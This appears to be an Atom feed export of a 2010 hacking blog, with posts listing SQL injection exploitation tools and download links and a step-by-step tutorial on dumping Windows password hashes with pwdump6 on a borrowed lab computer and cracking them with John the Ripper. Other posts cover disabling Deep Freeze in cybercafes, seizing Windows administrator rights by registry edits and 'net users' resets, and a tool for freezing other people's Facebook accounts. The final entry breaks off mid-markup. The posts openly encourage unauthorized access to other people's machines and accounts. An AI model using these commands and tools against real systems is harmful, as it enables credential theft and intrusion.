<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7130931598212594807</id><updated>2011-11-27T15:43:46.620-08:00</updated><title type='text'>Hacking</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>62</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-4613411311713852873</id><published>2010-08-24T23:56:00.000-07:00</published><updated>2010-08-24T23:56:51.410-07:00</updated><title type='text'>The best scanner SQL injection</title><content type='html'>&lt;script src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;amp;cid=sO23aMPfjUo%3D&amp;amp;chan=8hcdU8pj4A0%3D&amp;amp;type=5&amp;amp;title=006699&amp;amp;text=000000&amp;amp;background=FFFFFF&amp;amp;border=FFFFFF&amp;amp;url=006699" type="text/javascript"&gt;&lt;/script&gt;  &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_Dctv9GCvTgs/THS-kRQdi6I/AAAAAAAAAak/SOvY84M4EbA/s1600/sql-logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/THS-kRQdi6I/AAAAAAAAAak/SOvY84M4EbA/s200/sql-logo.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;While the adoption of web application for running an online business has enabled companies to connect seamlessly with their customers, it also exposed a number of security problems arising from incorrect code. Vulnerabilities in Web applications that allow hackers to gain direct and public access to sensitive information (eg personal data, login credentials). &lt;br /&gt;&lt;br /&gt;Web applications allow visitors to send and retrieve data to / from the database via the Internet. Databases are the heart of most web applications. They store data required for web applications to deliver specific content to visitors and provide information to customers, suppliers and others &lt;br /&gt;&lt;br /&gt;SQL Injection is perhaps the web applications-the most &lt;span class="fullpost"&gt;common hacking techniques that try to pass SQL commands through a web application for execution by the back-end database. vulnerability is presented when user input is not properly cleaned and thus executed. &lt;br /&gt;&lt;br /&gt;Checking for SQL Injection vulnerabilities involves auditing your web applications and the best way to do this is by using automated SQL Injection Scanners. We've compiled a list of free SQL Injection Scanners we believe will be a value to both web application developers and professional security auditors. &lt;br /&gt;&lt;br /&gt;SQLIer - SQLIer taking vulnerable URL and attempts to determine all the necessary information to exploit the weaknesses of SQL Injection by itself, does not require user interaction at all. Get SQLIer. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://bcable.net/project.php?sqlier &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL injection attacks. Get SQLbftools. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.reversing.org/node/view/11 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-SQL Injection Brute Forcer - SQLibf is a tool to detect and exploit the work automatizing SQL Injection vulnerabilities. SQLibf can work in the visible and Blind SQL Injection. It works by doing a simple SQL logic operations to determine the level of exposure of the vulnerable application. Get SQLLibf. &lt;br /&gt;&lt;br /&gt;http://www.open-labs.org/sqlibf19beta1.tar.gz &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQLBrute - SQLBrute is a tool to force the crude data from databases using blind SQL injection vulnerabilities. Supports time-based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and does not require non-standard libraries. Get SQLBrute. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.justinclarke.com/security/sqlbrute.py &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bobcat - Bobcat is a tool to assist the auditor in taking full advantage of SQL injection vulnerabilities. This is based on research AppSecInc. This can be a list of related severs, database schema, and allows retrieval of data from the table that the application of the current user has access to. Get Bobcat. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SqlMap - SqlMap is an automatic blind SQL injection tool, developed in python, capable to perform database management system fingerprint active, enumerate entire remote databases and much more. SqlMap purpose is to implement a database management tool that fully functional system that takes advantage of web application programming security vulnerabilities that lead to SQL injection vulnerabilities. Get SqlMap. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://sqlmap.sourceforge.net/ &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Absinthe - absinthe is a GUI-based tool that automates the downloading process and content of the database scheme is vulnerable to Blind SQL Injection. Get absinthe. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.0x90.org/releases/absinthe/download.php &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQL Injection Pen-testing Tool - SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in Web applications. Get SQL Injection Pen-testing tools. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://sqltool.itdefence.ru/indexeng.html &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQID - SQL Injection digger (SQLID) is a command line program for SQL injections and common errors in websites. This can be done follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://sqid.rubyforge.org/ &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from websites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.unsec.net/download/bsqlbf.pl &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQL Power Injection Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It's main strength is its ability to automate tedious blind SQL injection with several threads. Get SQL Power Injection. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.sqlpowerinjector.com/ &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FJ-Injector Framwork - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities on web applications. This includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://sourceforge.net/project/showfiles.php?group_id=183841 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQLNinja - SQLNinja is a tool to exploit SQL Injection weakness in a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://sqlninja.sourceforge.net/ &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Automagic SQL Injector - The Automagic SQL Injector is an automatic SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where the error is returned. Get Automagic SQL Injector. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.indianz.ch/tools/attack/automagic.zip &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NGSS SQL Injector - NGSS SQL Injector exploit vulnerabilities in SQL injection on different database servers to gain access to stored data. Currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.indianz.ch/tools/attack/sqlinjector.zip &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-4613411311713852873?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/4613411311713852873/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/08/best-scanner-sql-injection.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4613411311713852873'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4613411311713852873'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/08/best-scanner-sql-injection.html' title='The best scanner SQL injection'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Dctv9GCvTgs/THS-kRQdi6I/AAAAAAAAAak/SOvY84M4EbA/s72-c/sql-logo.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-1869204810352047529</id><published>2010-07-24T08:07:00.000-07:00</published><updated>2010-07-24T08:10:32.898-07:00</updated><title type='text'></title><content type='html'>&lt;!-- Begin: http://adsensecamp.com/ --&gt; &lt;script src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;cid=sO23aMPfjUo%3D&amp;chan=8hcdU8pj4A0%3D&amp;type=5&amp;title=006699&amp;text=000000&amp;background=FFFFFF&amp;border=FFFFFF&amp;url=006699" type="text/javascript"&gt;&lt;/script&gt; &lt;!-- End: http://adsensecamp.com/ --&gt;&lt;br /&gt;Do you ever use a computer in a computer lab or borrow a friend or even use a computer in a public place? Well, usually klo in the Lab (based on personal experience) computer would be if you want to enter a password and should be asked first to the owner. Well, now we can see the password of the computer that we use without restarting the computer or even without installing any program like Cain, L0pthCrack, etc.. It only takes a little 'trust' to borrow a computer (fancy term social engineering) and two fruits of the program, namely pwdump6 and john the ripper. But klo happened to be common with the type of administrator login, that's hockey! cape2 not need a:&lt;span class="fullpost"&gt;   friend lending login again:-D.&lt;br /&gt;Previously you may never get a tutorial on how to know the user's password to hack an existing Windows XP or NT using pwdump. Yup, maybe this tutorial will be similar to the know-how to hack Windows XP, especially Windows XP SP2. Then what is the difference with the other tutorials? Currently Windows XP SP2 (or maybe SP1, CMIIW), used to protect Syskey to hash (to store encrypted passwords) can not be read and didump use or samdump pwdump. For more details, the following description of the Syskey [1]&lt;br /&gt;Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.&lt;br /&gt;If the first possible in Windows NT or XP (before SP2), we can still use pwdump or even directly with KaHT, then for Windows XP SP2 can not be used this way again (perhaps more accurately, pwdump can not be used again). Well this is the difference with the previous tutorial. If we use our previous pwdump old version, it is now used pwdump6 developed by fizzgig and the foofus.net Team. If you read the README from this pwdump6, then pwdump6 are:&lt;br /&gt;pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.&lt;br /&gt;&lt;br /&gt;A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.&lt;br /&gt;so pwdumpd6 can run and get the hash files needed an account that has Administrator equivalent access. Now, therefore, we must run a little social engineering. Just say to our friend, klo access the workgroup, but can klo ga pake ordinary login. But calm, usually by default the people most mebuat user with administrator account type. Or use a variety of ways, resources, effort and persuasion so that we can be able to log in first.&lt;br /&gt;&lt;br /&gt;If you already have access to the login type of administrators, the next way is to stay running pwdump6. If you have a flash, save it and take it wherever there continues pwdump6 go, who knows handy someday .. :-D. Ok, we run pwdump6 immediately wrote this. We recommend that you first copy to the hard disk pwdump6 (do not run from flashdik).&lt;br /&gt;1. CMD Run (Run-&gt; cmd)&lt;br /&gt;&lt;br /&gt;2. Run pwdump6 as follows (eg PwDump6 located in the folder D: \ PwDump6)&lt;br /&gt;&lt;br /&gt;D:\PwDump6&gt;PwDump.exe -o pass.txt 127.0.0.1&lt;br /&gt;&lt;br /&gt;pwdump6 Version 1.3.0 by fizzgig and the mighty group at &lt;/span&gt;foofus.net&lt;br /&gt;Copyright 2006 foofus.net&lt;br /&gt;&lt;br /&gt;This program is free software under the GNU&lt;br /&gt;General Public License Version 2 (GNU GPL), you can redistribute it and/or&lt;br /&gt;modify it under the terms of the GNU GPL, as published by the Free Software&lt;br /&gt;Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS&lt;br /&gt;PROGRAM. Please see the COPYING file included with this program&lt;br /&gt;and the GNU GPL for further details.&lt;br /&gt;&lt;br /&gt;Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}&lt;br /&gt;Key length is 16&lt;br /&gt;Completed.&lt;br /&gt;3. After that we will get pass.txt file containing a list of user and password are still encrypted. An example would look like the following: &lt;br /&gt;ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::&lt;br /&gt;Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::&lt;br /&gt;coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::&lt;br /&gt;Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::&lt;br /&gt;HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::&lt;br /&gt;SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::&lt;br /&gt;4. OK! password already in hands. The next task is pulled pass.txt crack file with the help of John The Ripper. We recommend that you first save the file to a USB pass.txt or upload them to a safe place, because this cracking process can be done anytime and anywhere. Based on experience, if not too difficult to guess password such as "adminkeren", "qwerty123", which does not usually take too long to mengecracknya by John The Ripper. But if the password using a combination of strange things like "P4ssW0rD", "S03S4h", etc., usually take longer, be left to sleep or maen aja first. Ok, now how ngecraknya gini nih.&lt;br /&gt;&lt;br /&gt;Download John The Ripper for Windows. For computers that use AMD processor, we recommend using a "john-mmx.exe". Or for that use Intel or AMD, can use the "John-386.exe". Previously pass.txt copy files into the folder where the "John-mmx.exe" or "John-386.exe" is (John171w \ john1701 \ run). After that, run the following command to stay and wait patiently for: &lt;br /&gt;D:\john171w\john1701\run&gt;john-mmx.exe pass.txt&lt;br /&gt;Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])&lt;br /&gt;REN123 (Administrator:2)&lt;br /&gt;TEBAK (Try:2)&lt;br /&gt;ADMINKE (Administrator:1)&lt;br /&gt;MUDAHDI (Try:1)&lt;br /&gt;OK! password is now invisible visible. So the password for user "Administrator" is "adminkeren123", derived from combining Administrators: 2 and Administrators: 2&lt;br /&gt;&lt;br /&gt;Administrator:1+Administrator:2 = adminkeren123 &lt;br /&gt;while for the user "try" is "predictable"!&lt;br /&gt;&lt;br /&gt;Easy is not it? The point still live capture file hash (password encrypted) using pwdump6 then crack the result with John The Ripper.&lt;br /&gt;&lt;br /&gt;Now, if we want to use computers in the Lab friends, his people do not have to search again. Stay pake aja Admin user directly again, but do not get caught with him ... .. :-D Or if you forget the administrator password, do not need to reboot the computer, then reset your password. Staying involved STEP 2 above ONLY!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-1869204810352047529?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/1869204810352047529/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/07/do-you-ever-use-computer-in-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1869204810352047529'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1869204810352047529'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/07/do-you-ever-use-computer-in-computer.html' title=''/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-1912113696604958769</id><published>2010-07-24T07:41:00.000-07:00</published><updated>2010-07-24T07:41:19.244-07:00</updated><title type='text'>(Deep UnFreezer)</title><content type='html'>&lt;!-- Begin: http://adsensecamp.com/ --&gt; &lt;script src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;cid=sO23aMPfjUo%3D&amp;chan=8hcdU8pj4A0%3D&amp;type=5&amp;title=006699&amp;text=000000&amp;background=FFFFFF&amp;border=FFFFFF&amp;url=006699" type="text/javascript"&gt;&lt;/script&gt; &lt;!-- End: http://adsensecamp.com/ --&gt;&lt;br /&gt;Create your cybercafe operators and the users who use Deepfreeze to protect and counteract the configuration changes on your PC from viruses and users are ignorant of, so from now on be careful because of Deepfreeze on your PC can be paralyzing and password used to unlock deepfreeze will not more useful with this Unfreezer Deep?&lt;br /&gt;Deep UnFreezer is a tool that allows you to &lt;span class="fullpost"&gt; change the status of Deep Freeze without needing a password or in other words paralyze Deepfreeze.&lt;br /&gt;Using Deep Unfreezer very quick and easy, you simply just pay attention to the position of the radio buttons to select a running process, and ending with the save status&gt; Exit&gt; Restart / shutdown the PC. So change will happen after the restart / shutdown.&lt;br /&gt;&lt;br /&gt;Follow the step below (see picture above) as a guide to use Deep Unfreezer:&lt;br /&gt;&lt;br /&gt;Deep Unfreezer 1.Ketika run, make sure Deep Freeze detected / detected on the columns of the log, click the button to check the status of load status of Deep Freeze.&lt;br /&gt;2.Apabila terdeksi the Deep Freeze does not automatically, then the user / files you have to find a position in the Deep Freeze.&lt;br /&gt;3.Fungsi from the selection process of radio buttons:&lt;br /&gt;A. Boot Froozen: a process that will enable Deepfreeze when the status of Deep Freeze thawed / Off.&lt;br /&gt;B. Thawed on next boot: The process to disable / thawed Deep freeze over and counted (line number that is set up) to do restart. For example we set the number 2, then the non-active Deep freeze will be done two times during the restart and on restart the three automatic switches (Frozen).&lt;br /&gt;C. Thawed Boot: The process to disable Deep Freeze, when the status of active Deepfreeze / Frozen.&lt;br /&gt;4. Status last click the Save button&gt; Exit&gt; Restart / Shutdown your PC.   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-1912113696604958769?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/1912113696604958769/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/07/deep-unfreezer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1912113696604958769'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1912113696604958769'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/07/deep-unfreezer.html' title='(Deep UnFreezer)'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-155604804964381372</id><published>2010-07-24T07:38:00.000-07:00</published><updated>2010-07-24T07:38:18.776-07:00</updated><title type='text'>1001 HOW TO GET RIGHT / ADMINISTRATOR PASSWORD</title><content type='html'>&lt;!-- Begin: http://adsensecamp.com/ --&gt; &lt;script src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;cid=sO23aMPfjUo%3D&amp;chan=8hcdU8pj4A0%3D&amp;type=5&amp;title=006699&amp;text=000000&amp;background=FFFFFF&amp;border=FFFFFF&amp;url=006699" type="text/javascript"&gt;&lt;/script&gt; &lt;!-- End: http://adsensecamp.com/ --&gt;&lt;br /&gt;Hi all, here I share a variety of (hopefully until&lt;br /&gt;1001 ways) to get administrator rights in Windows&lt;br /&gt;(Especially Win Xp) includes various software.&lt;br /&gt;When you try on your own computer make sure backup your hard drive. Sincerely for all members who&lt;br /&gt;more tau. Those who want to share / &lt;span class="fullpost"&gt;discussion too please&lt;br /&gt;&lt;br /&gt;1. Want to know the username and password only:&lt;br /&gt;a. Click on START and select RUN and type in CMD and hold ENTER&lt;br /&gt;(Go to command promt) and type&lt;br /&gt;"Net user" (without quotation marks)&lt;br /&gt;username appearing there.&lt;br /&gt;&lt;br /&gt;2. Hack windows administrator account&lt;br /&gt;(Note: not all systems are windows there)&lt;br /&gt;&lt;br /&gt;a. Sign In as guest / limited account&lt;br /&gt;b. Click START, RUN and type REGEDIT and ENTER&lt;br /&gt;c. Open this directory:&lt;br /&gt;[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows&lt;br /&gt;NT \ CurrentVersion \ Winlogon]&lt;br /&gt;d. Search "" AutoAdminLogon. ", Right click and select&lt;br /&gt;Modify and change the Value Data to "1"&lt;br /&gt;e. Exit and restart, immediately deh / automatic login to&lt;br /&gt;administrator.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Change Account Password without OLD PASSWORD&lt;br /&gt;a. Click on START and select RUN and type in CMD and hold ENTER&lt;br /&gt;(Go to command promt) and type&lt;br /&gt;net users administrator * (typed with signs&lt;br /&gt;stars) or if its already know the username type:&lt;br /&gt;net users "Pigs" * (The pig is the instance name of the username)&lt;br /&gt;b. Continue to have questions for the new password, type deh&lt;br /&gt;and confirm the new password again. After&lt;br /&gt;the new password that you use for login.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Auto Configuration - Logon&lt;br /&gt;a. Click START / RUN / type "control userpasswords2"&lt;br /&gt;(Without the quotation marks)&lt;br /&gt;b. Unchek (remove the check in writing) 'User must&lt;br /&gt;Enter a user name and password to use this computer "&lt;br /&gt;Choose one of the existing username and click OK&lt;br /&gt;(The function each time you log directly into&lt;br /&gt;administrator or the username is selected)&lt;br /&gt;c. Want more, the option "password for&lt;br /&gt;administrator "select Gaza" RESET PASSWORD "change tuh&lt;br /&gt;according to your wishes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Want to know more to hacking win xp, download&lt;br /&gt;Here:&lt;br /&gt;http://file2upload.com/file/16116/O-Reilly---Windows-&lt;br /&gt;XP-Hacks-chm.html&lt;br /&gt;&lt;br /&gt;6. Active Password Changer is a solution-based DOS&lt;br /&gt;Designed for resetting local user passwords in case&lt;br /&gt;of the administrator's password is Forgotten or lost.&lt;br /&gt;Forgotten password recovery software is useful if you&lt;br /&gt;lost the administrator password and Can not access the&lt;br /&gt;system operation. Other Windows login security&lt;br /&gt;restrictions like 'Account is disabled', 'Password&lt;br /&gt;never expires ',' Account is locked out ',' User Must&lt;br /&gt;Change Password at Next Logon 'and' Logon Hours' cans&lt;br /&gt;changed or reset. Supported platforms: Windows XP,&lt;br /&gt;2000, NT, Windows Server 2003 and Windows Vista.&lt;br /&gt;Active Password Changer Professional version now&lt;br /&gt;contains Windows application and Active @ Boot Disk&lt;br /&gt;Lite - Windows Vista based bootable CD / DVD ISO image.&lt;br /&gt;&lt;br /&gt;Download: 2.80 MB&lt;br /&gt;&lt;br /&gt;http://www.duniasex.com/anonym/?http://rap...hangePro3.5.rar&lt;br /&gt;&lt;br /&gt;Mirrors&lt;br /&gt;&lt;br /&gt;http://www.duniasex.com/anonym/?http://www...hangePro3.5.rar&lt;br /&gt;&lt;br /&gt;Pass: www.dl4all.com&lt;br /&gt;&lt;br /&gt;7. Password software Windows Key (recomended)&lt;br /&gt;Download here:&lt;br /&gt;&lt;br /&gt;http://www.sendspace.com/file/eno4g6&lt;br /&gt;(Name: Passware Windows Key Enterprise Edition v7.9.2141.rar&lt;br /&gt;Size: 10MB&lt;br /&gt;Description: Windows Password Recovery)&lt;br /&gt;&lt;br /&gt;good luck    &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-155604804964381372?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://winkom.blogspot.com/2008/10/1001-cara-mendapatkan-hakpassword.html' title='1001 HOW TO GET RIGHT / ADMINISTRATOR PASSWORD'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/155604804964381372/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/07/1001-how-to-get-right-administrator.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/155604804964381372'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/155604804964381372'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/07/1001-how-to-get-right-administrator.html' title='1001 HOW TO GET RIGHT / ADMINISTRATOR PASSWORD'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-7401048795371859164</id><published>2010-05-28T02:01:00.000-07:00</published><updated>2010-05-28T02:01:50.605-07:00</updated><title type='text'>THIS IS THE APPLICATION FOR FACEBOOK ACCOUNT freeze OTHERS</title><content type='html'>&lt;!-- Begin: http://adsensecamp.com/ --&gt; &lt;script src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;cid=sO23aMPfjUo%3D&amp;chan=8hcdU8pj4A0%3D&amp;type=5&amp;title=006699&amp;text=000000&amp;background=FFFFFF&amp;border=FFFFFF&amp;url=006699" type="text/javascript"&gt;&lt;/script&gt; &lt;!-- End: http://adsensecamp.com/ --&gt;&lt;br /&gt;Ever thought not to delete a facebook account of your friend, or even delete your own facebook account. Well, here's a tutorial that is appropriate for you. But, should not be used for crime well. . .&lt;br /&gt;Actually, this application has been known by several facebookers us, but for the friends who have not been able INFO, please continue reading.&lt;br /&gt;&lt;br /&gt;These applications are called facebook Freezer, its use is &lt;span class="fullpost"&gt;quite simple but the effect is quite dangerous!&lt;br /&gt;Applies to a very simple way. Simply enter the email address of the victim. Click Freeze, then wait until the process is 100%.&lt;br /&gt;To download please googling himself well. .. hehehe&lt;br /&gt;Update: who want to try and not be bothered googling please download   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-7401048795371859164?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/7401048795371859164/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/this-is-application-for-facebook.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7401048795371859164'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7401048795371859164'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/this-is-application-for-facebook.html' title='THIS IS THE APPLICATION FOR FACEBOOK ACCOUNT freeze OTHERS'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-3847625390666370387</id><published>2010-05-28T01:54:00.000-07:00</published><updated>2010-05-28T01:54:04.961-07:00</updated><title type='text'>Deepfreeze v 6.xx How to collapse in a computer cafe (preparation hack facebook password)</title><content type='html'>&lt;!-- Begin: http://adsensecamp.com/ --&gt; &lt;script 